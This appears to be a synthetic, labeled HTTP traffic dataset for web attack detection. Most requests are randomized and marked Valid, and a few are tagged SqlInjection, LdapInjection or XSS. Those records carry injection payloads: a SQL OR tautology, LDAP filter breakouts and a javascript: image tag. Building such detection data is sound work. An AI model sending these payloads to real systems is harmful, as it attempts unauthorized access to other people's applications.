runmnzk=x&7shutdownystdinKQ0jOtyb=59&ian=042&3ncMJ2EDDfK=78226&Mla9=5&sr=5&dstomatod=521503

End - Id: 5695
Start - Id: 1949
class: Valid
GET /qou/e-n1fWVes/ODopen2dI/3VFzAhttpsD1CH/u4epbe.js? HTTP/1.0
Host: 216.216.243.49
Connection: close
Accept: audio/basic;q=0.2, application/postscript;q=0.2, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 152.106.51.28
Cookie: uvtareMr9nyoiri=esD
Cookie2: $Version="71"
Date: Wed, 29 Nov 06 05:10:29 CET
ETag: "5IM0a8wAua3B.5K8dP"
Expect: beodarf=Ylw6oeMa
From: eegL@aene5f.biz
If-Modified-Since: Fri, 21 Oct 05 18:04:32 CET
If-Unmodified-Since: Fri, 04 Apr 08 13:20:16 GMT
If-Match: "TE6cKGkRIuc-27@th7"
If-None-Match: "0wu8yiPfoBp.LqLc"
If-Range: "CPEuImimEJCGIK95YZK"
Max-Forwards: 5
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM cm5lYWVERHN0QWFuV2VubHJvZWVwcGhhdGtld2Z0eGVyb3NBZnJl
Authorization: Basic OHJUM2F0bjpjZGl6aWU=
Range: 0-,-750641
Referer: /yye2y5b/san5es/ylrlbai/nntaleSt/Utst1nha.nsf
TE: trailers
Trailer: Date
User-Agent: SqseeKari4twI
UA-CPU: Sparc
UA-Disp: 410,9893,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1543x007
Via: 7.6 131.55.188.191:197, yei3nh/4.5 www.Ilren.htm:99987
Transfer-Encoding: biets
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 663 www.Libe.html "iztelp" "Wed, 09 May 07 24:02:00 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1949
Start - Id: 33218
class: Valid
POST /UlthtdrcpYkoi2cLdiv/gVHp/scNiorld/ctV3EJpositionmxSC/ea/YBccconnect@2u/o6ieaoeqar/twgeaini4tdaeH/E0sCihpradibadtehcQ/dYv8qxKLFDdeIYpOo2cF.html? HTTP/1.0
Content-Length: 166
Content-Language: ma5ikeao
Content-Encoding: deflate
Content-Location: /tdirsd/giagswi.swf
Content-MD5: bGNvYXRiaGlvenIwdWFpMw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Feb 06 18:20:38 GMT
Last-Modified: Fri, 16 Jan 09 11:17:33 GMT
Host: 110.238.29.169:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic, x-mac-greek;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 129.82.95.244
Cookie: zeexme9nuetentn=pf3tgnR;gpYectlS2piry=t;hucusisd=ps+6sg'hyenehtt9htaccese;w2zhttpsSscriptkMiframe0=Wjrwoni9Oxt;au9d7Tnjeubeua= or
Cookie2: $Version="2"
Date: Sun, 30 Apr 06 22:43:31 CET
ETag: W/"Lh37D4HRbMWINQEwJ"
Expect: 100-continue
From: aenere@diek5iacf.it
If-Modified-Since: Fri, 24 Sep 04 24:00:18 UTC
If-Unmodified-Since: Sat, 18 Apr 09 09:43:48 UTC
If-Match: "WmP26alWc0MXoYv8_"
If-None-Match: *
If-Range: Thu, 22 May 08 20:49:57 UTC
Max-Forwards: 14
MIME-Version: 8.6
Pragma: uisrui='lf7aeoy'
Proxy-Authorization: Digest realm
Authorization: g9xb dE2b=iiSdeoIo
Range: -352533,78-491
Referer: http://www.uialsws.be/cnah.wav
TE: deflate,deflate,deflate;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/7.5 (compatible; MSIE 3.8; Open BSD i586; qdnrutsn)
UA-CPU: MIPS
UA-Disp: 776,0303,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 334x7223
Via: FTP/3.4 83.93.181.243, 0.7 www.qsrtr1Rt.shtml
Transfer-Encoding: gzip
Upgrade: kuu/2.5, oth/3.8, 2es/8.1
Warning: 136 163.36.250.216 "merp" "Sun, 19 Nov 06 07:32:24 CET"
X-Forwarded-For: 83.167.179.226
X-Serial-Number: 979942
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qD5f2mVstdin=ChutAEdOrtdeiars&X1AM_OU= honradeletesldhps&aNtevf=e+h&ImBxBnullKOWAO= deia&ps=141&lcopyozTUMYR=cksroU&liooaa2ptlesn=<Rne&tcuekrgn=eHty&etunne=772841

End - Id: 33218
Start - Id: 15757
class: Valid
GET /ixJK9fQz/rcE@QyWFLlPjQDO7qCax/pKSJ9sc-cZ1@C@2L/ldDd3m/qB5tYmc/oXV4/m4-v.EBu0D0G6jP/u3Lnf8@RuzqAf@/oM3.gA/trgtkgce.shtml?rcnrsexlOphh=teRxlet2dur2l8&elfQsleatI=3isgnvohHeu&ef1to=%5DshsA&j2k@26=tl&ocotossbayo=myoM&iNsdrpy=521678783&enljteoyeaen=%40&_z1Dwindow.openz5O95I=3tbRoeT%3EpMdeon&oeliTntc=eyeErScZNw&HA_AIR-KX0G=e+ie&eiadmd4l3kmzE=783273&l9edngmaedx=rtEcatt%29oct+v&uryDKesoL2sr=catitzI3%27hdocumentgHa&0ounionOgObyT1@g=rwvs-JGopR%40 HTTP/1.1
Host: 200.92.165.246:80
Connection: keep-alive
Accept: application/*, video/mpeg, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, gzip
Accept-Language: el7rl-dtezc;q=0.8
Cache-Control: no-cache
Client-ip: 195.199.12.74
Cookie: qusitadotie=oanerwa;lurn=oofJsjb;5ecdtv=8
Cookie2: $Version="5"
Date: Fri, 09 Jun 06 06:35:48 CET
ETag: W/"8gjWBxU9zw2EktF"
Expect: 4holfns=5vhutao;ooaaLatu=8sDfieo
From: Ptcoirt@emaueRf8s.fr
If-Modified-Since: Tue, 20 Apr 10 06:22:49 CET
If-Unmodified-Since: Tue, 08 Jul 08 12:26:15 CET
If-Match: "ocfpziy6HWCt2iUJ7EP"
If-None-Match: "NDBZjG4buq98467A9J"
If-Range: *
Max-Forwards: 24
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: lihojw cfazeyii=eaiemae
Authorization: NTLM Y25pa3JuaGVzY3NsVHNpbmxkMGFlZWVzZWZoeG9ndW9hdE1rdFRmekF0ZGFTb2Vv
Range: -8290,128062-441231,3-
Referer: http://utcpea.org/emehtn/eofdt.php3
TE: chunked,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 2.9; I5-ri; rv:5.7.5) Gecko/32146927
UA-CPU: MIPS
UA-Disp: 238,6520,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 516x1974
Via: 2.7 www.xre7lp.png
Transfer-Encoding: deflate
Upgrade: fav/1.1, ayrmt/1.8, brsiit/7.7, udri/7.9
Warning: 240 81.227.30.13 "eamm5" "Mon, 26 Dec 05 16:14:01 UTC"
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15757
Start - Id: 20530
class: Valid
GET /openX.html? HTTP/1.1
Host: 2.29.110.61
Connection: keep-alive
Accept: text/plain;q=0.3, application/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: vtasen-l3Ishn, wLooita-eI;q=0.8
Cache-Control: no-transform
Client-ip: 109.69.212.119
Cookie: gMTSbin23= oag;rfee4ern=40313;Irtynelxshevfwt=3\eg2eae%o
Cookie2: $Version="002"
Date: Thu, 27 May 04 02:57:52 UTC
ETag: W/"9qDaWd0xOniudY@1"
Expect: 100-continue
From: m4Ilxlpt@rise1wePl.it
If-Modified-Since: Mon, 07 Apr 08 13:11:57 CET
If-Unmodified-Since: Mon, 23 Feb 04 08:24:04 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9868
MIME-Version: 6.1
Pragma: Ew9ltdnN='ad'
Proxy-Authorization: NTLM bkVoSWFhbXRWcjlrZXlyaWVlbGdobG9lckl0ZW43ZTFzZWxlcjdmM2lob2l2ZXBP
Authorization: Digest opaque="wrot0"
Range: 9-471
Referer: /uhyusG/nu3Qoi/kev1tj/ogrsmjfa/wo8jmia.dll
TE: trailers
Trailer: From
User-Agent: ionesw6csdtNiheuto
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5447x066
Via: ryed5o/0.6 128.155.43.246, FTP/6.2 www.nvtua.js
Transfer-Encoding: identity
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 508 www.tpobco.jpg "aou9O" 
X-Forwarded-For: 55.186.171.144
X-Serial-Number: 48113953855
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 20530
Start - Id: 30992
class: Valid
GET /tj7Zy970roVM/cTy/uAMvOQGw/iru5irohelheaanek/eot/uemIeieort4/yIgdwceSdeuhia8o/rletlivfDliuree/xeZh6daisntntaSSdum/deleteaLxyA1/i_G8VuK35c5GarV/7ZB.htm?gtmShpt2=lqe1&tibise=jotFPeE0de&tHho=dcnsttsii0&ntiezgo9nc=icuq&A9xaBfqmEdd=liod&HacceptLTmZDQkr=A HTTP/1.0
Host: www.nn7itnb.com:80
Connection: keep-alive
Accept: image/jpeg;q=0.3, video/*;q=0.5, text/plain;q=0.6
Accept-Charset: cp-950;q=0.1, iso-8859-8-i, us-ascii;q=0.7, ks_c_5601-1987;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 93.143.127.166
Cookie: tMfdwdgRr=3g;hLa=25286044
Cookie2: $Version="588"
Date: Sat, 29 Sep 07 08:09:12 UTC
ETag: W/"el0c1yy8dBuCFQ9LYC"
Expect: e6nheo
From: roiehnen@tctren.st
If-Modified-Since: Tue, 15 Dec 09 08:10:41 GMT
If-Unmodified-Since: Fri, 04 Dec 09 20:10:05 GMT
If-Match: *
If-None-Match: *
If-Range: "8U0Bkv.NC7Umb1IO"
Max-Forwards: 614
MIME-Version: 7.6
Pragma: T3rz=arr
Proxy-Authorization: eeu7 ueeiov3a=orpt7utl
Authorization: Digest response="187165a14F3Cebfaf8B6C7ace8e71fcd"
Range: 6-
Referer: http://www.tmyE.biz/aoru.ace
TE: chunked;q=0.8,trailers,deflate;q=0.5
Trailer: Warning
User-Agent: enbfi6T/6.0.3.2
UA-CPU: MIPS
UA-Disp: 9729,1420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 301x912
Via: 4.3 www.gpomea7.js:575, FTP/8.9 www.A3oot7aU.jpeg
Transfer-Encoding: compress
Upgrade: eeeh/0.3, fDafA/6.5, cd2jet/7.1
Warning: 175 www.rwitemw.jpeg "lzlarmInhrd" "Wed, 18 Jan 06 20:37:52 CET"
X-Forwarded-For: 73.18.235.121
X-Serial-Number: 65625
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30992
Start - Id: 3467
class: Valid
GET /spranmNozc/u1oedoa/tmetaautoexecGMnullQOcLhIdiv/hFyiqqvzL0Ew/jXZIuj5.TY/oliaESacq8yqet4r/f1lV5BHMriJbcYeuU/tNWjPWk8hgiOqN/eApINTMom7R183S/PAmexmlJ2yBs.cfm? HTTP/1.0
Host: 105.172.237.49
Connection: s4nyhkn
Accept: application/*;q=0.7, audio/*, application/x-tar
Accept-Charset: isiri-3342, ks_c_5601-1987, euc-tw;q=0.3
Accept-Encoding: compress, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 2.156.108.121
Cookie: ehintinmn2pmjge=aavRddiv;UeYt=as;ty=srNI8tonae;emr=rusinnnYarlikel9a
Cookie2: $Version="7"
Date: Wed, 28 May 08 07:48:52 GMT
ETag: W/"4W_Asm-QCrk-AoB"
Expect: get3ir=dctzsN
From: rnmnhIO@9tEdmhfosy.fr
If-Modified-Since: Sun, 27 Feb 05 04:24:47 GMT
If-Unmodified-Since: Tue, 16 Nov 04 09:18:18 CET
If-Match: "e@CntOT5omPEQMDm7E"
If-None-Match: *
If-Range: Wed, 10 Jun 09 16:15:11 UTC
Max-Forwards: 240
MIME-Version: 2.9
Pragma: 3nnc=Uees
Proxy-Authorization: r5le hmnr=ywltxE
Authorization: 0Yyaa4 eefl=sh9s0r3n
Range: -535,169-
Referer: /9niatq/edeEpoi0/o3eyoe/5bige/mXi3h.sh
TE: gzip,chunked;q=0.9
Trailer: User-Agent
User-Agent: jqmeriuao0qNtqbesf
UA-CPU: Sparc
UA-Disp: 086,5443,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8177x498
Via: HTTP/2.0 128.241.1.157
Transfer-Encoding: fonud
Upgrade: ei6/5.2, fRh/0.7, hi06e/2.4, gae/7.2, tjo/3.1
Warning: 221 www.2htoeld.css "RdAlg" 
X-Forwarded-For: 175.189.142.174
X-Serial-Number: 1870735508221770189
----: --------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3467
Start - Id: 35388
class: SqlInjection
GET /i1ntnl/.XtmpbodyaaDy5ijformF/ltoukln/hWpYPXEE/cA4MhH1L0dz/Fwsock_streame3qXzXxN61o/xdkjuanemoWcm6c/nE/d./MJKnullNPk/rltziRcshi3iRtatil6t.htm?vtuhcoNoChsmfa=ru2iframe92pan&1J4my3o=e%28egsuwothytt&ngx5eri=81262&ehN=OR++++1269804%3E39476505642 HTTP/1.1
Host: www.hekFfan.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, gzip
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 85.15.118.197
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="44"
Date: Sun, 02 Nov 08 17:09:23 GMT
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: ta1Ecwsh=4waohsyh;84resi=rttalif
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Mon, 12 Apr 10 15:52:10 GMT
If-Unmodified-Since: Tue, 19 May 09 06:51:15 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: tfdyi wetoINl=Wpol
Range: 55-,0-,6611-
Referer: http://fpe9wr4e.ch/sIntep/i7mrdAr/stEttA3/sIla.jpeg
TE: trailers
Trailer: Transfer-Encoding
User-Agent: te8vhiz9/7.2
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 177x860
Via: 8.2 150.228.174.84, HTTP/1.3 www.stacaDle.tiff
Transfer-Encoding: identity
Warning: 933 134.218.228.163:17 "vrrEhe411r" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 35388
Start - Id: 29493
class: Valid
GET /osjyKCfj5Du/s.OGoa4yJD8GSPD3/0tbnohaeoeinnlbele81/debeoiYslq.jpg?ha=353&xe=oh0 HTTP/1.0
Host: 201.151.126.117:6
Connection: close
Accept: audio/x-wav, audio/basic, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ldhze8-H;q=0.8, n-o
Cache-Control: no-store
Client-ip: 12.169.110.212
Cookie: qan4e=9ai'n;Ss4birEeentdQb=hw90rMK9SPK5;skneieOgtm=ol
Cookie2: $Version="626"
Date: Sat, 24 Nov 07 12:46:56 CET
ETag: "i4dEmJechhOYXCU"
Expect: 100-continue
From: hnoyso@ioJaegaa.st
If-Modified-Since: Sun, 24 Jun 07 24:58:27 GMT
If-Unmodified-Since: Thu, 13 Aug 09 19:10:17 CET
If-Match: *
If-None-Match: "MbmAiwYg2ali60hBmVFR"
If-Range: Fri, 12 Jun 09 10:19:06 UTC
Max-Forwards: 43
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: 40goe uren9esp=e5th
Authorization: Digest qop=auth-int
Range: 6551-
Referer: http://www.oieerAm.biz/cncv1wt.js
TE: chunked,gzip;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/3.1 (Windows; U; WinNT 1.5; Ec-r6; rv:6.9.0) Gecko/23581549
UA-CPU: Sparc
UA-Disp: 103,9341,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 522x597
Via: 2.6 177.76.150.232:5, HTTP/4.4 180.67.207.188, 1.1 www.y4teaoob.js
Transfer-Encoding: ewow
Upgrade: nene/2.6
Warning: 270 101.148.72.64:95 "i8edoTSEtsz" "Wed, 28 Dec 05 21:22:16 CET"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29493
Start - Id: 37774
class: LdapInjection
GET /pk3PXhR-941R2rcp/DelioiousthmscT/raygntry1hssNe/dDEz9OKtESsWqHwUdV/auratp/ii2H/8Awtkir6titlell6tmts/dnDoeespxtieoay6w/lXRe5y.cgi?Tcfpip_Xp.9=gTwyAzE2fDp&QdG=%29++++%28%7C+++%28ahu%3D9ns*%29 HTTP/1.0
Host: www.owrcn.org:80
Connection: close
Accept: */*
Accept-Charset: euc-cn, euc-kr, x-mac-roman, gb2312
Accept-Encoding: compress, deflate, deflate, deflate;q=0.6, gzip
Accept-Language: *
Cache-Control: max-age=14
Client-ip: 3.137.158.163
Cookie: cadmerd=nrub;trEirsa=145;lp=f gpt$e;gfstt=2722297;ovetn=77254;ft=55891
Cookie2: $Version="8"
Date: Mon, 03 Nov 08 21:43:00 GMT
ETag: "K8JclCYhB4_YHqlv"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Mon, 06 Feb 06 08:24:43 CET
If-Unmodified-Since: Mon, 23 Mar 09 08:54:31 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Jun 04 07:58:20 GMT
Max-Forwards: 609
MIME-Version: 0.6
Pragma: a1hdtnir=aoc4
Proxy-Authorization: Basic ZTdhYWNjdDpldWR3aG1lNQ==
Authorization: NTLM YWN0bkllRDJpZWhnaFp0aHRvQXBudmVib2N6Z1Blcm5yZGRxR2Zhaw==
Range: -6185,-86
Referer: /1on5rsto/ywtcrapc/onph/r5t4/2lAnqje.gz
TE: gzip;q=0.8,gzip;q=0.2,gzip
Trailer: Range
User-Agent: Mozilla/9.4 (Machintosh; U; PPC Mac OS X 2.7; s3-es; rv:5.1.5) Gecko/21599432
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 807x162
Via: 2.7 185.236.219.232, 0.0 www.oztrfu.shtml
Transfer-Encoding: gzip
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37774
Start - Id: 17895
class: Valid
GET /ronBt7Sct8nasqtass2i/KPbg.z7K/M9mhmxEttTmodtorrt/rinshXNgcnIuo5E/0d@Ja@i1sR41V0/favO8N7Z/OcawodinadEnataf.php4?Mvatrscqr0s=cse%3AL&SaTJx=ocEb89osynn&aLD68T=691&khjP-Su@B=Mt68thhfasNir8ahic&rijeu=nAGIAtgcTMAU&5f=%2B%24ysystemc&Ncs=opt%3Fsnseyneoerh&vnytagaedai=heay HTTP/1.0
Host: www.hyJtNlvsyq.ch:80
Connection: keep-alive
Accept: audio/basic;q=0.5, text/*;q=0.6, audio/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, identity, deflate;q=0.8, deflate
Accept-Language: *
Cache-Control: min-fresh=3956
Client-ip: 235.44.149.89
Cookie: 2iceAstn=nxmlhOgtx;Snvua=cXFBOQ;X8VdeleteBtNF=657002;a6ukeiee6eqf=hGkpwL
Cookie2: $Version="5"
Date: Wed, 19 Nov 08 19:30:11 UTC
ETag: "bLNGsv_WFsHfUWx1.kz_"
Expect: 100-continue
From: rdny@hctpuostk.cz
If-Modified-Since: Fri, 05 Jun 09 16:25:04 CET
If-Unmodified-Since: Fri, 07 Jul 06 18:52:18 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 09 Feb 06 01:52:15 GMT
Max-Forwards: 36
MIME-Version: 3.8
Pragma: snsc='ulr'
Proxy-Authorization: Digest realm
Authorization: Digest opaque="ulmex"
Range: -87,9893-
Referer: http://5jxl.de/rart/Na5ranta.php
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: d5GNtTXqmy http://www.sTt2.ch
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: HTTP/5.5 www.2xGgfi.css:5336
Transfer-Encoding: identity
Upgrade: Rhati/3.5, utw/4.6, 9reuu/0.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 4786268
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17895
Start - Id: 46834
class: XSS
POST /znPvEsEmJ4i4i6cfM/8c/9qGeBtrdKgjNZVF/t6pW2fPP./eVPPZ4cqGamPbM0hu/aeOlePuilc/vvsI4psP_CLnfv.tiff? HTTP/1.0
Content-Length: 106
Content-Language: saezeal,deob7ts
Content-Encoding: gzip
Content-Location: /1Tes/esin/lfancae/nr0lAnsa.pdf
Content-MD5: YXNlaWF1aG5jZU9laGdsYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Aug 04 23:59:25 GMT
Last-Modified: Mon, 12 Apr 04 10:41:14 GMT
Host: www.oese.ch:88
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 169.136.109.14
Cookie: os6rss1SgG=4847;hoGxegibeE=Ko(%iveig ?fa8wprocessing-instruction;4cFX9k=779
Cookie2: $Version="28"
Date: Mon, 19 Apr 10 13:00:31 CET
ETag: "4y65XizpsvxblzyDhxg"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Sun, 20 Apr 08 02:39:38 UTC
If-Unmodified-Since: Mon, 05 May 08 20:40:51 GMT
If-Match: "8GA@JKhk@20w68W-nV"
If-None-Match: *
If-Range: *
Max-Forwards: 3696
MIME-Version: 5.0
Pragma: ci=o7xr
Proxy-Authorization: NTLM Y2xlb0RhYWloY2Vsbm50dG5oZW94ZWV0MHNveWllTW84bm5pajhmcjdyb3Q5
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: http://pjee2e.uk/hiahaD/corN/e8ltde/ro1tw.html
TE: deflate;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 0.0; n0-7a; rv:2.1.3) Gecko/98250076
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 6.3 251.194.107.11
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 250 www.tehienag.htm:29 "ch4lludtirn1fS" 
X-Forwarded-For: 92.3.241.226
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CHQHgAKTB6document=8usm2iaaueq&0EiKgdhelnyyopa=<img+src=javascript: alert('r9me.nbtas')>

End - Id: 46834
Start - Id: 19978
class: Valid
GET /aform34Dyd27YfB/eA5rbh-uQ/ne6rhde3/Eallln0/Kg.eEihtaccesstyleBI/cCuk9r8_aMe1mrqrhXA/2aOEu7fxalwftgac/stkCc9l87i-s@C/BDjVCBQMKLxrf.cgi?aersEreai=t%27%3Ax&k4skejntybie0tu=+t+&BD61otzinloh=a1Duy%40h&oftesast=ne&ahi=+U2+l%3A&peltte7mjm=or-c HTTP/1.0
Host: www.iYefata.com
Connection: close
Accept: video/quicktime;q=0.2
Accept-Charset: x-mac-korean;q=0.9, iso-8859-4, windows-874;q=0.9, cp-932
Accept-Encoding: 
Accept-Language: aaylit-r, iawg-ncCunAu;q=0.5
Cache-Control: only-if-cached
Client-ip: 37.116.233.151
Cookie: evg=3betweeni+wt;G58l2<s;sx=30048826
Cookie2: $Version="231"
Date: Fri, 29 Dec 06 05:29:59 UTC
ETag: "0PTCgOhFPB@rwN7"
Expect: eeer
From: z3on9@atfseid.cz
If-Modified-Since: Thu, 28 Jul 05 21:47:21 CET
If-Unmodified-Since: Thu, 06 Sep 07 11:15:40 CET
If-Match: "HQA1hJ2nMhbu_pD"
If-None-Match: "HrvdU7TyPg9CTxkLc"
If-Range: Mon, 18 Oct 04 15:29:32 UTC
Max-Forwards: 98
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM bm56ZW9haG4wbXNhb250ZWJoZWhobXRoemR3dGhsa3R0dXcxdGVuc3JhZWxsaQ==
Authorization: Basic SXJwdGRzOnN5cWk=
Range: -175214
Referer: http://www.yswt.fr/rzkutt.jpeg
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.2 (X11; U; Open BSD i586 3.5; uc-on; rv:5.8.5) Gecko/46576633
UA-CPU: StrongARM
UA-Disp: 773,5885,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1394x7760
Via: 8.1 www.vbuaiR.jpeg, 0.6 249.22.111.11, 4.1 207.106.97.57
Transfer-Encoding: deflate
Upgrade: scjah/2.9, rqic/8.5, Eucg/8.4, 50h/6.8
Warning: 269 www.sio9tfe.jpeg "ertsEceeNmilreasie" 
X-Forwarded-For: 39.120.128.67
X-Serial-Number: 81008512960196254
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19978
Start - Id: 17315
class: Valid
GET /W1_ln9ystyle%uAS70_/c@qhwSSct1gOX/ntmtklSlyQadetdnat/Nieaqe/eFlpU1o/yBDysr@pkCMp4Wdl/xF4Kd/nlKTLjB-X@dc64E2y_WO/gE7YhttpsiE8ar@aELM/tel/iyusr5sdatGsihscat.html?eEo4ieyeu=ddmp&a2b=iEt&V4qjrx=67640&H4kP4M4=852&J9Uc=djeRaeI&tht9=mn+t&h2r=cogdsiyc2 HTTP/1.0
Host: 197.67.25.159
Connection: close
Accept: audio/*
Accept-Charset: x-mac-korean, euc-jp;q=0.9, iso-2022-jp;q=0.0
Accept-Encoding: deflate
Accept-Language: *;q=0.5
Cache-Control: max-age=42294
Client-ip: 108.40.148.167
Cookie: ILt=1;ei=aKcJN;mmcarSopeelpw=197036293;eetaistwhsi= ot@p ;C9tbti=e;o;iInner5=2
Cookie2: $Version="0"
Date: Thu, 02 Apr 09 02:48:59 CET
ETag: W/"z7ZIhf6.P0MN21t42TF"
Expect: 100-continue
From: Az90tn@tbpaeA.ch
If-Modified-Since: Tue, 09 Feb 10 23:04:46 UTC
If-Unmodified-Since: Sun, 23 Nov 08 09:58:49 UTC
If-Match: "xEKX.Q9HcCJZw05"
If-None-Match: *
If-Range: Thu, 25 Mar 04 08:13:28 CET
Max-Forwards: 199
MIME-Version: 0.0
Pragma: o='Ki7'
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: Basic Z2xiZW1pOjV0TmQ3YQ==
Range: -245038,-1,-13038
Referer: /faojtt.swf
TE: deflate;q=0.2
Trailer: Range
User-Agent: c0eyeiu (eXFKkFN)
UA-CPU: Sparc
UA-Disp: 8556,725,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0027x5589
Via: 2.7 www.aohcma.png:1019, 9.0 226.198.255.90:8, 3.9 247.64.216.196
Transfer-Encoding: identity
Upgrade: rtwAw/6.8, rmn5/1.4, az0mh/5.0
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 8125405037849
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17315
Start - Id: 37101
class: LdapInjection
GET /SPHmocha5/lIkmTwAjQJs_D06NG/eioa/V2hPB36iT/RnT76quares7opo0Ceae/Av5QmIqscriptMe3aO/hrtdt/lk_ZeyO0qMk/s7jD..css?9SeewLtnskle=rwhconnectkuhtpassh%25h%24g%3Bej&tvmmE0oatm7ers=wfTBK4wSf&JpUhdjscript4hd=ht&re=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&h5tbr9mt9dnoe=1TW1rqGMNm&xp_exFGQY0Fn=e7orhe0EisoIdd5&B22LGwinntNJ=T8w+x&svtoNese3syAt=609837&bl9Srenet=c HTTP/1.1
Host: 91.170.215.254
Connection: keep-alive
Accept: application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: eoi0dS-aqliik, cbsNh-ui82sre9;q=0.1, rstdans-fftx, rrtgy-xy6ker
Cache-Control: min-fresh=23
Client-ip: 236.39.89.101
Cookie: dojtrcu=/$a+~phtpasslog;t+i4zadmin/catqn;bnsa7maahelea=smeso;nushRiUejnsor1h=ern;wdevk0ecneidn=rRA_Jq;xvxo3hehsoNoI0n=0944143630;h1=o0YbDTdejsx
Cookie2: $Version="020"
Date: Sat, 11 Nov 06 02:33:52 CET
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: idorit=hhox;9ha3ae=2Vh6e
From: 5cih8hH@th6En.it
